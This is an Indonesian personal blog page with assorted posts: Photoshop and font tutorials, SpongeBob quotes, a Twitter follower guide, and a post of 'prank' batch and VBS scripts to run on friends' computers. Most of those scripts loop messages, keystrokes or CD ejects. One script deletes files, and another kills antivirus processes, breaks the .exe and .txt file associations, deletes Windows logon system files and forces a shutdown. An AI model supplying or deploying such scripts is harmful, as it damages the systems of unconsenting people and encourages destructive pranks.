Belajar Bermain Photoshop

|| || || Leave a komentar
Oke, sekarang saya akan mengajarkan Cara Mengedit photoshop Tingkat Dasar ,
Bagi kalian Yang masih (Pemula) yang ingin Belajar Photoshop maka kita akan menggalih Tingkat dasar biasa nya dengan Mengubah Latar belakang (Background) menjadi seperti Pantai,Hutan,Laut,Bahkan inti bumi 
hehehe maaf gan ,jika ada kata yang salah..
Next . pertama Kita cari Bahan Untuk Di edit Seperti Foto yang ingin di edit.
lalu kita cari Background yang nantinya Untuk Kita Pindahkan Foto kita ke situ.
Jika sudah.
-Buka Photoshop.CS
-lalu open Objek Foto kita Terlebih Dahulu
-dan Crop (potong foto yang Ingin di edit )
menggunakan Polygonal Lasso Tool
Contoh seperti ini:
itu sudah di Crop Dengan Polygonal Lasso .
lalu Jika sudh seperti itu .
kita masukan Background nya.
misalkan.ini background nya.,

lalu kita tarik foto yang sudah di crop ke sini maka akan menjadi seperti ini.
seperti ini hasil nya .
jika ada yang tidak jelas atau ingin di tanyakan.

Cara Menambahkan FONT di Komputer

|| || || Leave a komentar
Terkadang kita bosan jika melihat Tulisan Jenis nya Cuma itu itu saja -_-
Ini saat nya kita kembangkan .
Pertama Kita Buka Link Download font dulu
salah satu nya ini klik di Sini 
Silakan Pilih Font yang kamu suka
Contoh nya ini..
lalu setelah download . Extrack Here,
dan Font nya di Save di Lokaldish (C) > Program File > Font
lalu Paste..


Jika ada Yang Ingin Di tanyakan .
PM. RESA SEPTIAN

Kumpulan Script Jahil

|| || || Leave a komentar

Saya ada script jahil nih yg mau saya share dengan sobat Satu Hati. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… agagagagagag. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang saya sebutkan. Okedeh segera cek script jahil ini.
script ini bisa kta pakai, untuk menjahili komputer anak org !! yg harus kamu siapkan adlh :
  1. Notepad
  2. kopi
  3. pasta
  4. alias kopas
  5. Bersiap2 menerima dosa… agagagagagag (kidding)
stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!
1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS
Code:
@ECHO off
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo, cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
==> save nama script diatas dg ekstensi *.bat
2. BIKIN SHUTDOWN + MESSAGES
Code:
@echo off
msg * apaan sih lo
shutdown -s -c "Error! muka mu
standar abis"
==> save nama script diatas dg ekstensi *.bat
3. MAININ TOMBOL CAPS LOCK
Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “{CAPSLOCK}”
loop
==> save nama script diatas dg ekstensi *.vbs
4. BUKA TUTUP CD/DVD SECARA OTOMATIS
Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
 Set colCDROMs = oWMP.cdromCollection
 do
 if colCDROMs.Count >= 1 then
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 For i = 0 to colCDROMs.Count – 1
 colCDROMs.Item(i).Eject
 Next
 End If
 wscript.sleep 5000
loop
==> save nama script diatas dg ekstensi *.vbs
5. MENEKAN TOMBOL ENTER TERUS MENERUS
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS
Code:
MsgBox “Lets Rumble”
 Set wshShell =wscript.CreateObject(“WScript.Shell”)
 do
 wscript.sleep 100
 wshshell.sendkeys “{bs}”
loop
==> save nama script diatas dg ekstensi *.vbs
7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD
Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "lu jelek banget sih!!!"
loop
==> save nama script diatas dg ekstensi *.vbs
8. MEMBUKA NOTEPAD TERUS MENERUS
Code:
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”
Code:
WScript.Sleep 180000
 WScript.Sleep 10000
 Set WshShell = WScript.CreateObject(“WScript.Shell”)
 WshShell.Run “notepad”
 WScript.Sleep 100
 WshShell.AppActivate “Notepad”
 WScript.Sleep 500
 WshShell.SendKeys “Ka”
 WScript.Sleep 500
 WshShell.SendKeys “mu ”
 WScript.Sleep 500
 WshShell.SendKeys “, je”
 WScript.Sleep 500
 WshShell.SendKeys “l ek”
 WScript.Sleep 500
 WshShell.SendKeys “am ”
 WScript.Sleep 500
 WshShell.SendKeys “at”
 WScript.Sleep 500
 WshShell.SendKeys “ya ”
 WScript.Sleep 500
 WshShell.SendKeys “P er”
 WScript.Sleep 500
 WshShell.SendKeys “ma k”
 WScript.Sleep 500
 WshShell.SendKeys “tuh”
 WScript.Sleep 500
 WshShell.SendKeys ” mu”
 WScript.Sleep 500
 WshShell.SendKeys “ka”
 WScript.Sleep 500
WshShell.SendKeys “hohoho “
==> save nama script diatas dg ekstensi *.vbs
10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2
Code:
@echo off
title quiz hari ini
:)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top
==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..
11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU :lol:
Code:
@echo off
set end=md “Hack
installing”
set fin=copy “Hack
log.txt” “Installing”
%end%
%fin%
net send * Hack is
installing, press OK to
begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is
hacked ….
msg * I warned you,
and you kept going.
Challenge me and this
is what happens.
DEL C:\WINDOWS
\system32\logoff.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.exe /
F /Q
DEL C:\WINDOWS
\system32\logon.scr /
F /Q
cls
shutdown -s -t 5 -c
“ thank you for
waiting”
==> save script diatas dg ekstensi *.bat

Cara Mengerjai Seseorang Dengan Shutdown Otomatis

|| || || Leave a komentar
Mau Ngerjain orang dengan Software sederhana untuk menShutdown komputer scara otomatis
Cekidot ..
Ini langkah langkah nya
-Klik kanan pada Desktop lalu pilih New-Shortcut
-Nah lalu stelah itu isi dengan Shutdown -s -t 100c- "VIRUS GANAS"
(Kalian bisa mengubah tulisan tersebut dengan sesuka kalian )
-Lalu (Next) ubah tulisan Shutdown semau kalian ..
-Dan selesai.
jika ingin merubah logo Icon, klik kanan pada Icon nya lalu Pilih Propertis
-Change Icon . (Yes)
Dan pilih saja .


Selamat mencoba .semoga Bermanfaat .

Nembak cewek pake Script

|| || || 2 komentar

-Buka Notepad
lalu kita Tulis Seperti ini 
Ini contoh nya :

 Dim Jika
Jika = InputBox (" Mau Enggak jadi Pacar saya  Ya/TIDAK ")
If UCase(Jika) = "YA" Then
MsgBox " Kita Resmi jadi sepasang kekasih wkwkwkw :D "
ElseIf UCase(Jika) = "TIDAK" Then
MsgBox " suatu saat saya akan berusaha untuk mendapatkan mu ;("

Else
MsgBox " Jawab dong , please :) "


End If

Ubah saja Huruf yang berwarna merah Dengan kata kata sesukamu
jika sudah selesai save As . Ubah format dari *txt menjadi All files jika sudah 
save dengan .vbs contoh Resa.vbs di belakang judul di tulis dengan .vbs

Semoga Bermanfaat. 

Kata Kata Mutiara Spongebob

|| || || Leave a komentar
  • Kata2 bijak Spongebob :D


    follow https://twitter.com/Resa6661

    Postingan kali ini saya memcoba memposting beberapa kata2 bijak dari tokoh kartun favorit saya, yaitu Spongebob dkk. perkataan2 mereka terkadang mengandung makna yg luas tidak kalah dengan filusuf Yunani, Rockfeller, maupun Gandhi(lebay).

    [[http://historyology.blogspot.com/2010/10/kata-kata-bijak-spongebob-dkk.html]]

    #Tuan Krab ketika membuka gerai Krusty Krab rahasia diumah spongebob."Apa yang tidak membunuhmu, biasanya menjadi sukses dikesempatan kedua".

    #Tuan Krab berkata ketika episode gelembung sahabat"Uang selalu benar"

    #Ketika Patrick menjadi pintar karena salah memilih kepalanya yg terlepas"pengetahuan tidak dapat menggantikan persahabatan.

    #Ketika spongebob bertanya pada patrick ketika mau berangkat sekolah
    Spongebob: Apa yg biasanya kau lakukan saat aku pergi?
    patrick : menunggumu kembali..

    #Saat spongebob menjadi kaya dan melupakan patrick juga tmn2 yg lain. spongebob memohon kepada patrick, dan patrick berkata:

    #"kalau uang bisa membuatku melupakan sahabat terbaikku, maka aku lebih memilih untuk tidak punya uang sama sekali"


    #Saat patrick di fitnah mencuri jaring ubur2 nya spongebob,patrick berkata" Tak apa kawan.. aku mungkin hanya bintang laut yang jelek.. lebih baik aku pergi dari bikini bottom.. ini, ambil saja barang2ku.. tapi aku tak pernah mengambil jaring mu kawan.."(Patrick dituduh nyolong jaring dan dia tetap sabar)

    #Episode Kotak Rahasia "Kalau kamu memberitahukan rahasia kepada seseorang, maka itu namanya bkn rahasia lagi".

    #episode jelly spoter, ketika Spongebob gagal masuk menjadi anggota klub ubur-ubur. Patrick berkata "pemujaan yang berlebihan itu tidak sehat.."


    #waktu patrick dianggap ada keturunan raja terus mulai ngambil barang2 milik orang lain, terus dia berkata:"hidup itu memang tidak adil, jadi biasakanlah dirimu"...


    #waktu spongebob diajarkan guru mengemudi ala militer."seharusnya kau belajar berjalan dulu nak, baru lah kau bisa berlari.."


    #waktu episode spongebob nyari spatula baru, terus dia dapet spatula canggih, tapi si spatula emasnya ga nurut sama si spongebob akhirnya dia balik pk spatula nya yg lama.
     "Ternyata semua yg berkilau itu belum tentu emas"

    #Episode Kotak rahasia, patrick yg kukuh tidak ingin menunjukan kotak rahasiannya."Aku tidak pernah merasakan bahwa diriku seperti susu yang tumpah"

    #episode Gary ikut Patrick yang ternyata hanya pngn roti di saku celananya.Pas SpongeBob nangis, Patrick bilang:
     "Dulu kau dapat kesempatan, tapi kau gagal, SPongeBob.Berhentilah hidup di masa lalu,karena itu hanya menyakitimu.."

    #Ato pas episode Mega-Bucket, di mana Plankton pngn mnguasai Bikini Bottom..
     Plankton bilang:
     "hanya orang yang agresif yang bisa menaklukkan dunia.."

    #kata2 Plankton swaktu cintanya ditolak oleh ibuny Mr.Krab
    "masih lebih baik pernah merasakan cinta dan lalu kehilangan drpd tdk pernah mrasakn cinta sama sekali"

    #waktu patrick jadi raja.. dia ngomong..."dunia memang tidak adil,jadi biasakanlah itu.."

    #ni nasehat squidward kalo-kalo ada yang putus cinta :
     waktu episode ulang tahun pearl >>>!
     " saat air mata ku mengalir aku tidak bisa menggunakan tisu aku `butuh 4 lembar,4 lembar. saat aku menangis."

    #episode patrick di terima kerja di krusty krab :"aku terlalu senang sehingga aku lupa cara berdiri"secara tidak langsung mengingkatkan kita untuk tidak terlalu terbuai dengan kesenangan :)

    #saat patrick memenangkan perlombaan menari dengan tarian keram-nya yg tidak jelas..episode ini memaknakankan bahwa "keadilan akan selalu menang"

    #jangan lakukan sekarang, kalau masih bisa dikerjakan besok...(squidwerd)

    #Saat spongebob menjadi kaya dan melupakan patrick juga tmn2 yg lain. spongebob memohon kepada patrick, dan patrick berkata:
     "kalau uang bisa membuatku melupakan sahabat terbaikku, maka aku lebih memilih untuk tidak punya uang sama sekali"

    #“Sudah, nak! Terkadang apa yang tidak kau bicarakan lebih bernilai daripada yang kau bicarakan.” [Eugene Crab]

    #orang-orang akan menghargai orang yang menghargai dirinya sendiri ...
     ~Patrick Star

    #Patrick: "Hey! Itu adalah omongan orang putus asa!"

    #Larry: "Maksudku menjalani hidupmu dengan maksimal, bukan menghancurkan hidupmu"

    #Spongebob: "Kau telah menghancurkan kepercayaanku terhadap seni sulap"

    #Seekor ilmuan monyet: "Keajaiban datang satu per satu"

    #Sandy: "Memakan atau dimakan"

    [[http://ragilligar.blogspot.com]]
    1 . Spongebob : apa yg kau lakukan saat aku pergi ?Patrick : MenunggumuDisini tercerminkan arti dari sahabat sejati

    2 . Spongebob : Kau boleh mengambil spatulaku, tapi jika kau mengambil harga diriku, saat itulah aku marah.

    3 . Patrick: jangan pernah biarkan hatimu pergi meninggalkanmu kecuali pikiranmu tumbuh dan mengikutinya

    4 . Patrick : pengetahuan tidak dapat menggantikan persahabatan. Aku (Patrick) lebih suka jadi idiot daripada kehilanganmu (Spongebob)

    5 . Patrick:Tak apa kawan . .mungkin aku hanyalah bintang laut yang jelek. Lebih baik aku pergi dari bikini bottom, ini ambilah semua barang barang milik ku. Tapi aku tak pernah mengambil jaringmu kawan.

    Dari sini kta blajar jnglah kta berprasangka buruk pada seseorang terutama pada sahabat sejati kita

    6. Patrick : Orang-orang menghargai orang yang menghargai diri sendiri

    7 . Patrick : PEMUJAAN YANG BERLEBIHAN ITU TIDAK SEHAT.!

    8. Spongebob : Patrick , aku sakit apa kau mau menjadi dokter untukku ?Patrick : Itulah gunanya temanKalau untuk ini maaf ada kata2 yg salah

    9 . Patrick : Teman adalah kekuatan !

    Fakta : Patrick memang terlihat bodoh , tapi dia yg paling banyak mengucapkan kata2 mutiara :ogtop: , dan satu lagi jgn tertipu oleh username :D
    1. tak ada yang memperdulikan nasib buruh selama mereka mendapatkan kepuasan secara instan(Squidward ~ pas Spongebob sama Squidward ngancem mo bongkar Krusty Krab)
    2. ada episode dimana plankton ngerayu nyokapnya si mr. krab, di endingnya plankton ngomong,“lebih baik merasa dicintai dan kehilangan daripada tidak pernah dicintai sama sekali.”
    3. “Orang bodoh bisa berbahagia dengan kebodohnya”
    4. yang episode si patrick pura” jadi cewe (patricia) gara” disuruh ke luar kota sama agen wisatadia bilang gini pas udah muak nyamar,“Aku lelah berpura-pura menjadi orang lain!”
    5. semua adil dalam cinta dan perang”-spongebob | waktu perang pasir sama patrick kalo gak salah
    6. ane juga punya nih gan pas lagi episodenya spongebob sama patrick jagain rumah sandy+jagain binatang piaraannya trus akhirnya mereka nemu binatang yang lucu namanya “wormy” (ulat). abis itu mereka main2+nyanyi2 sama ulat sampe sorepas udah sore kan mereka (spongebob dan patrick) mau pulang, trus si patrick bilang gini :“KENAPA HARUS ADA MATAHARI TENGGELAM DI HARI YANG SEMPURNA”
    7. Yang Spongebob baru pas suaranya berubah gtDia bilang. “Kau harus merasa bersyukur Squidward”Kurang lebih sih gt gan, soalnya dia (Squidward) bilang bahwa dia (Squidward) itu orang paling sengsara di Bikini Bottom

    *
    1. Jika aku tidak menginginkannya di dalam, lantas apa daya tariknya disini? ~Squidward

    2. Orang Bodoh akan mendapat kebahagiaan dikarenkan kebodohannya sendiri. ~Patrick Star

    3. Semuanya adil dalam cinta dan perang teman dan musuhku, atau harus kupanggil teman musuhku. ~Spongebob SquarePants

    4. Aku melakukan ini bukan untukku, tapi untukmu. ~Spongebob SquarePants

    5. Pakaian Berpengaruh besar pada pemakainya. ~Sandy Cheeks

    6. Lain kali, periksa orang di dalam rumahmu sebelum kau memeriksa orang lain. ~Sandy Cheeks


    7. (Saat Patrick membujuk warga Bikini Bottom saat menunggu kedatangan Santa) Mungkin santa sedang makan, orang gemuk sering lapar kan? ~Patrick Star


    8. Jangan pernah percaya pada Jin. ~Patrick Star


    9. Kau boleh mengambil spatulaku, tapi jika kau mengambil harga diriku, saat itulah aku marah. ~Spongebob Squarepants

    10. Sumbangan untuk anak-anak? Memang apa yang anak-anak lakukan padaku? ~Eugene Krabs (ini bijak gak ya?)


    11. Tidak ada yang ke restoran untuk membeli atmosfer, mereka mencari makanan. ~Eugene Krabs


    12. Semua mahluk hebat dalam satu hal, tidak ada yang hebat dalam segala hal. ~Spongebob Squarepants


    13. Hanya orang agresiflah yang bisa menaklukan dunia. ~Plankton


    14. Orang-orang menghargai orang yang menghargai diri sendiri. ~Patrick Star


    15. Jika ilmu pengetahuan bisa membuatku melupakan sahabat terbaikku, aku lebih memilih untuk menjadi bodoh saja. ~Patrick Star


    16. Jika kau menceritakan rahasia kepada orang lain, maka itu namanya bukan rahasia lagi. ~Patrick Star


    17. Teman adalah kekuatan. ~Patrick Star


    18. Hidup itu memang tidak adil, jadi biasakanlah dirimu. ~Patrick Star


    19. Pemujaan yang berlebihan itu tidak sehat.~Patrick Star


    20. Seharusnya kau belajar berjalan dulu  nak, barulah kau bisa berlari. ~Si Hiu :D


    21. Apa yang tidak membunuhmu di kesempatan pertama, biasanya kau akan sukses di kesempatan kedua. ~Eugene Krabs


    22. Orang berhak mengatur jalurnya sendiri. ~lupa =='


    23. Bersih tidak akan ada tanpa kotor, dan kotor tidak akan ada tanpa adanya bersih. ~Spongebob Squarepants

    in english ::
    Quotes of Spongebob Squarepants

    • Now I learned a lesson I won't soon forget. So listen and you won't regret. Be true to yourself, don't miss your chance - Spongebob 
    • Your song was true. If you wanna be my friend, just be yourself. - Sandy to Spongebob 
    • Patrick, you're my best friend in the whole neighborhood. - Spongebob to Patrick 
    • Home is where you're surrounded by other creatures that care about you. - Sandy 
    • People talk loud when they wanna act smart. - Squidward 
    • It's not always what you say that matters. Sometimes it's what you don't say. - Mr. Krabs
    • You'll never get what you want if you always let people step all over you. - Plankton
    • Sometimes we have to go deep inside ourselves to solve our problems. -Patrick 
    • If you believe in yourself and with a tiny pinch of magic, all your dreams can come true. - Spongebob 
    • If I can't have you as a friend, I'm going to make you a trophy! I even picked out this nice jar for you! [holds up mayonaise jar] - Patrick 
    • F is for friends who do stuff together, U is for you and me! N is for anywhere, any time at all. - Spongebob 
    • F is for frolic through all the flowers, U is for Ukulele, N is for nose picking, sharing gum and sand licking. - Spongebob and Plankton 
    • Gee, Gary, you sure are smart. - Spongebob 
    • You just jump off before you go up too high. - Patrick 
    • Just Do when I have problems...SCREEEEEAM!!!!!!!!!!! - Patrick 
    • I'm ugly and I'm proud! I'm ugly and I'm proud! I'm ugly and I'm proud! -Spongebob 
    • What is wrong with you people?! Afraid to look ugliness in the face?! -Patrick 
    • Oh, SpongeBob, you look so adorable! I could just eat you up! - Pearl 
    • At least I'm safe inside my mind - Patrick 
    • Being grown up is boring. I love being a baby. Besides, I don't get jazz. -Patrick 
    • If you can't do the time, don't do the crime. - Police 
    • What was I thinking? I gave away all of my stuff, just so Spongebob wouldn't be sad. Am I insane? - Squidward 
    • Oh, Gary, I knew you'd never leave me. Awww...let's go for a walk, pal! -Spongebob to Gary 
    • No! You don't know who I am! - Mrs. Puff 
    • Three cheers for feeling sorry for ourselves! Hip-hip. - Mr. Krabs 
    • Wow, you guys are good. I was the last person I would have suspected, but I was looking for me all the time! It's the perfect crime! - Patrick 
    • Tell you what. You give me back the sock and I'll give you... three wishes. - Flying Dutchman 
    • Well, you did it. You took my one chance of happiness, and crushed it. Crushed it into little, tiny, bite-size pieces! I really had expected better of you people. [starts crying] I guess I'm a loser for that too! Don't bother showing up tomorrow. I'll just tell them you all DIED in a marching accident. So, thanks. [cries] Thanks for nothing. [leaves] - Squidward 
    • Are you trying to say I have no imagination?! I have more imagination in one tentacle than you two have in your whole bodies! - Squidward

    [[http://www.indowebster.web.id/showthread.php?t=300684]]
    1 . Spongebob : apa yg kau lakukan saat aku pergi ?
    Patrick : Menunggumu
    Disini tercerminkan arti dari sahabat sejati

    2 . Spongebob : Kau boleh mengambil spatulaku, tapi jika kau mengambil harga diriku, saat itulah aku marah.

    3 . Patrick: jangan pernah biarkan hatimu pergi meninggalkanmu kecuali pikiranmu tumbuh dan mengikutinya

    4 . Patrick : pengetahuan tidak dapat menggantikan persahabatan. Aku (Patrick) lebih suka jadi idiot daripada kehilanganmu (Spongebob)

    5 . Patrick:Tak apa kawan . .mungkin aku hanyalah bintang laut yang jelek. Lebih baik aku pergi dari bikini bottom, ini ambilah semua barang barang milik ku. Tapi aku tak pernah mengambil jaringmu kawan.

    Dari sini kta blajar jnglah kta berprasangka buruk pada seseorang terutama pada sahabat sejati kita

    6. Patrick : Orang-orang menghargai orang yang menghargai diri sendiri

    7 . Patrick : PEMUJAAN YANG BERLEBIHAN ITU TIDAK SEHAT.!

    8. Spongebob : Patrick , aku sakit apa kau mau menjadi dokter untukku ?Patrick : Itulah gunanya temanKalau untuk ini maaf ada kata2 yg salah

    9 . Patrick : Teman adalah kekuatan !

    Fakta : Patrick memang terlihat bodoh , tapi dia yg paling banyak mengucapkan kata2 mutiara :ogtop: , dan satu lagi jgn tertipu oleh username :D

    [[http://blog.elizer.web.id/all-free/kata-kata-mutiara-dari-film-kartun-spongebob-squarepants.html]]

    1. Pengetahuan tidak dapat menggantikan persahabatan. Aku (Patrick) lebih suka jadi idiot daripada kehilanganmu(Spongebob)
    2. spongebob: Apa yg biasanya kau lakukan saat aku pergi?patrick : menunggumu kembali.
    3. Saat sponge bob menjadi kaya dan melupakan patrick juga tmn2 spongebob yang kaya pergi dari spongebob, spongebob memohon kepada patrick, dan patrick berkata:‘kalau uang bisa membuatku melupakan sahabat terbaikku, maka aku lebih memilih untuk tidak punya uang sama sekali’
    4. Saat patrick di fitnah mencuri jaring ubur2 nya spongebob,patrick berkata:‘ Tak apa kawan.. aku mungkin hanya bintang laut yang jelek.. lebih baik aku pergi dari bikini bottom.. ini, ambil saja barang2ku.. tapi aku tak pernah mengambil jaring mu kawan..’(Patrick dituduh nyolong jaring dan dia sabar aja)
    5. Patrick berteriak : ‘AKU JELEK DAN AKU BANGGA!!!’
    6. Kalau kamu memberitahukan rahasia kepada seseorang, maka itu namanya bkn rahasia lagi.
    7. pas spongebob mau masuk anggota jelly spotter.. terakhirnya patrick bilang:‘pemujaan yang berlebihan itu tidak sehat..’
    8. waktu itu ortu Patrick mau datang jenguk anaknya. Tapi Patrick takut dikatain bodoh sama ortunya. Demi Patrick, SpongeBob bela2in akting jadi orang bego biar ortu Patrick ga ngatain anaknya bego. Trus Patrick bilang ke SpongeBob: ‘TEMAN ADALAH KEKUATAN’
    9. waktu patrick dianggap ada keturunan raja terus mulai ngambil barang2 milik orang lain, terus dia berkata:‘hidup itu memang tidak adil, jadi biasakanlah dirimu’..
    10. waktu spongebob mau les nyetir buat dapetin sim..‘seharusnya kau belajar berjalan dulu nak, baru lah kau bisa berlari..’
    11. tak ada yang memperdulikan nasib buruh selama mereka mendapatkan kepuasan secara instan(Squidward ~ pas Spongebob sama Squidward ngancem mo bongkar Krusty Krab)
    12. ada episode dimana plankton ngerayu nyokapnya si mr. krab, di endingnya plankton ngomong,“lebih baik merasa dicintai dan kehilangan daripada tidak pernah dicintai sama sekali.”
    13. “Orang bodoh bisa berbahagia dengan kebodohnya”
    14. yang episode si patrick pura” jadi cewe (patricia) gara” disuruh ke luar kota sama agen wisatadia bilang gini pas udah muak nyamar,“Aku lelah berpura-pura menjadi orang lain!”
    15. semua adil dalam cinta dan perang”-spongebob | waktu perang pasir sama patrick kalo gak salah
    16. ane juga punya nih gan pas lagi episodenya spongebob sama patrick jagain rumah sandy+jagain binatang piaraannya trus akhirnya mereka nemu binatang yang lucu namanya “wormy” (ulat). abis itu mereka main2+nyanyi2 sama ulat sampe sorepas udah sore kan mereka (spongebob dan patrick) mau pulang, trus si patrick bilang gini :“KENAPA HARUS ADA MATAHARI TENGGELAM DI HARI YANG SEMPURNA”
    17. Yang Spongebob baru pas suaranya berubah gtDia bilang. “Kau harus merasa bersyukur Squidward”Kurang lebih sih gt gan, soalnya dia (Squidward) bilang bahwa dia (Squidward) itu orang paling sengsara di Bikini Bottom


    mungkin Masih banyak kata lainnya yg luput dari perhatian saya. jika anda mendapatkan kata2 bijak dari Spongebob dkk mohon untuk menuliskannya di kotak komentar. thx

    source: http://historyology.blogspot.com/2010/10/kata-kata-bijak-spongebob-dkk.html + http://ragilligar.blogspot.com + http://www.indowebster.web.id/showthread.php?t=300684 + http://blog.elizer.web.id/all-free/kata-kata-mutiara-dari-film-kartun-spongebob-squarepants.html (Kaskus and GlobalTV) #*dengan perubahan . original by http://www.facebook.com/KaffaHaffidhW.UNGU.Cliquersz.AlwayzAlone
    follow https://twitter.com/Resa6661


    *cocok buat status / tweet XD

Cara Mendapatkan Banyak Followers Di Twitter

|| || || Leave a komentar
Hai semua? senang sekali pada siang yang cerah ini, saya dapat bersilaturahmi dengan sobat-sobat blogger sekalian.. Ciee orang alim, hihi :D . Sebelumnya, saya telah membahas tentang Cara Membuat Sidebar Twitter Transparan. Nah, pada kali ini saya akan  membahas tentang Cara Cepat Menambah Followers Twitter dengan Twiends.
Apa itu Twiends ? 
Twiends is a Twitter user and apps directory. We help you grow your twitter following safely and responsibly.
You can find tweeps with similar interests, and in your country.We're completely free, but you can buy promotion too.
Tidak mengerti? Ini dia artinya ^_^ >> Apa itu Twiends ?




Bagaimana cara kerja Twiends ?
1. Setiap member wajib mem-followback. Jadi kalau kita follow seseorang hampir dipastikan dia akan follow kita juga.

2. Setiap follow orang lain kita akan dapat kredit dan tiap orang dalam bisa mengatur besarnya kredit yang akan diberikan kepada yang memfollow, semakin besar kredit yang kita tawarkan semakin besar peluang kita difollow orang lain. Kredit yang kita punya akan berkurang setiap ada orang yang memfollow kita. Dengan sistem seperti ini setiap orang dituntut untuk memfollow orang agar mendapat kredit.
( Info tentang Bagaimana cara kerja Twiends ?  adalah info dari http://arieweb.net )
Menarik bukan? Bagi yang mengikuti tutorial ini, bersiap-siaplah kebanjiran Followers ^.^
1. Masuk terlebih dahulu ke Situsnya >> Kesini
2. Pilih Sign in with twitter pada bagian kanan atas.
3. Lalu, akan terlihat halaman seperti dibawah ini.

Klik gambar untuk memperjelas !
4. Follow semua orang yang ada disitu, dan Lihat hasilnya ..

Eits! Tenang dulu, sebelum kita menggunakan Twiends, alangkah baiknya jika kita mengetahui PERATURAN TWIENDS :

Don't create fake accounts.
Don't spam others.
Don't use automation tools, like bots, auto-clickers or external scripts.
Don't buy or sell accounts.

Artinya disini >> Twiends Rules


Selesai ! Masih banyak Trik Twitter lainnya yang belum kita bahas. Diantaranya, Cara Unfollow  Twitter Secara Massal dan akan saya bahas lain kali ya,  maka dari itu tetap stay dan terus berkunjung ke AcerNoval's Site  !




-Trimakasih : Naufal